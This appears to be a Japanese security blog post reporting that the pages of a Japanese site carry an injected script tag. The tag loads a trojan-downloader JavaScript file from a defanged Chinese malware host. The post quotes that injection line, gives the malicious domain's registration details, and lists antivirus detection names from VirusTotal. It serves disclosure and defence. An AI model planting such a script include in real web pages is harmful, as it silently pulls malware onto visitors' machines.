hxxp: // pnrm.jp/ hxxp: // www.pnrm.jp/ hxxp: // 210.224.177.201/↑のindex.htmlに下記のマルウェアダウンロードJSコードを発見しました↓
<script type="text/javascript" src="hxxp : //web・nba1001・net:8888/tj/tongji.js"> </script>↑何物かと中国トロイのダウンロードJSコードです。
マルウェアコードを削除して欲しい。
pnrm.jpドメイン登録情報を見たほうがいいと思います、あやしいので...
web.nba1001.netは中国のマルウェアサイトですので、現在ROにした。
Domain name: NBA1001.NET
Registrant:
qq3800cc1
qq3800cc1
na, na 0000000
CN
Administrative Contact:
qq3800cc1, qq3800cc1
qq3800cc1
na, na 0000000
CN
+86.0000000000
Technical Contact:
qq3800cc1, qq3800cc1
qq3800cc1
na, na 0000000
CN
+86.0000000000index.htmlはVirus Totalにアップロードしたので⇒【情報はこちら】
現在下記のマルウェア検知結果が出ました↓
nProtect : Win32.Jadtre.B CAT-QuickHeal : HTML/Iframe.EW McAfee : W32/Fujacks.a!htm K7AntiVirus : EmailWorm VirusBuster : HTML.Malurl.J F-Prot : HTML/Linker.AB Symantec : W32.Fujacks.CE!html Norman : Exploit.LW TotalDefense : HTML/Emerleox.IL TrendMicro-HouseCall : HTML_DOWN.A Avast : HTML:Script-inf ClamAV : JS.Agent-156 Kaspersky : Trojan.JS.Agent.btr BitDefender : Win32.Jadtre.B Sophos : Troj/Badsrc-M Comodo : TrojWare.JS.Agent.SCW F-Secure : Win32.Jadtre.B VIPRE : Trojan-Clicker.HTML.RemoteScript (v) AntiVir : HTML/Dldr.Agent.OB TrendMicro : HTML_DOWN.A McAfee-GW-Edition : W32/Fujacks.a!htm Emsisoft : Trojan.JS.Redirector!IK Jiangmin : Trojan/Script.Gen Microsoft : Virus:HTML/Jadtre.A ViRobot : HTML.Downloader_Geno_iframe GData : Win32.Jadtre.B Commtouch : HTML/Linker.AB AhnLab-V3 : HTML/Agent PCTools : Net-Worm.Fujacks ESET-NOD32 : HTML/ScrInject.B.Gen Rising : Hack.Exploit.Script.HTML.IFrame.az Ikarus : Trojan.JS.Redirector Fortinet : JS/Agent.BTR!tr AVG : JS/Downloader.Agent Panda : W32/Katusha.Q
0 件のコメント:
コメントを投稿